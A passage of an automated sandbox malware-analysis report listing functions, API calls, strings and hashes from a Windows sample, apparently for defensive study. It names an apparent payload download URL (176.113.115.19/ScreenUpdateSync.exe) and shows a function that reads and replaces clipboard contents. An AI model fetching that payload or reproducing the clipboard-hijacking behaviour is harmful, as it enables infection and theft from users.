__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 42908ff57393ecb554ca568fc12e9326ff4705fd749688a3b6bbc729bace43dc
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: 42908ff57393ecb554ca568fc12e9326ff4705fd749688a3b6bbc729bace43dc
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: df7099e6b6e7795d0fbd5e9afe4ff51e43c99f0fb0ace34248401a5e00c0a4af
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: df7099e6b6e7795d0fbd5e9afe4ff51e43c99f0fb0ace34248401a5e00c0a4af
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02120E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02120223,?,?), ref: 02120E19
SetErrorMode.KERNEL32(00000000,?,?,02120223,?,?), ref: 02120E1E

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 44aadaba4ceec3c7039f90236b980d150b62195d6aed535f06090d2979b601d5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 68D012311451287BD7002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754

Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0040377C

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 7df3e409c6b59b8aa831ab12f760028bd04ff3d894a0208e97c09ec0715edeee
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 7df3e409c6b59b8aa831ab12f760028bd04ff3d894a0208e97c09ec0715edeee
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: caa3fed0a7f872be89a083567e545f4644478fb9da4458cd4b1d938140bf4f95
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: caa3fed0a7f872be89a083567e545f4644478fb9da4458cd4b1d938140bf4f95
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 004B0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 004B04B6

Memory Dump Source

Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1d7c54f9b752043f7fd156f200c53e1b36436ed6ca17afae0d88c3c60b4dbe96
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2A116C79A00208EFCB01DF98CA85E99BBF1EF08351F058095FA489B362D335EA50DF90

Non-executed Functions

Function 02121942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0212194D
Sleep.KERNEL32(00001541), ref: 02121957

Part of subcall function 0212CE77: _strlen.LIBCMT ref: 0212CE8E

OpenClipboard.USER32(00000000), ref: 02121984
GetClipboardData.USER32(00000001), ref: 02121994
_strlen.LIBCMT ref: 021219B0
_strlen.LIBCMT ref: 021219DF
_strlen.LIBCMT ref: 02121B23
EmptyClipboard.USER32 ref: 02121B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02121B46
GlobalUnlock.KERNEL32(00000000), ref: 02121B70
SetClipboardData.USER32(00000001,00000000), ref: 02121B79
GlobalFree.KERNEL32(00000000), ref: 02121B80
CloseClipboard.USER32 ref: 02121BA4
Sleep.KERNEL32(000002D2), ref: 02121BAF

Strings

4#E, xrefs: 0212195D
i, xrefs: 021219C0

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 13c71eda43c7430e2934dac0d436295253fa47ecdf24b743a7c2b671904bebdf
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: CE513531C403A4EED321DFA8ED457EC7B74FF1A306F015225E905A2163EB708689CBA9

Function 02122361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0212239C
GetClientRect.USER32(?,?), ref: 021223B1
GetDC.USER32(?), ref: 021223B8
CreateSolidBrush.GDI32(00646464), ref: 021223CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021223EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0212240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02122416
MulDiv.KERNEL32(00000008,00000000), ref: 0212241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02122443
SetBkMode.GDI32(?,00000001), ref: 021224CE
_wcslen.LIBCMT ref: 021224E6

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 118d8ada6abde20bc900316c5a4ce3c385c53fc7a631e8bff582dbe301a7bf7a
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 2271ED72900228AFDB229F64DD85FAEBBBCEF09751F0041A5F509E6155DA70AF84CF20

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#IND, xrefs: 0043E9B6
1#INF, xrefs: 0043E9CB
1#SNAN, xrefs: 0043E9BD
1#QNAN, xrefs: 0043E9C4

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0215B9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0215BCF4,?,00000000), ref: 0215BA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0215BCF4,?,00000000), ref: 0215BA97
GetACP.KERNEL32(?,?,0215BCF4,?,00000000), ref: 0215BAAC

Strings

OCP, xrefs: 0215BA29
ACP, xrefs: 0215B9F3

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 377f89e761478b388b7726438b639d6bfc4997163f4bfc8800fb3d99fd597b4f
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 9121A432688124EAEB348F54D901BA7B3A6FB40E5CB5784A5FD2AD7108F732DB40C390

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 0215BBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

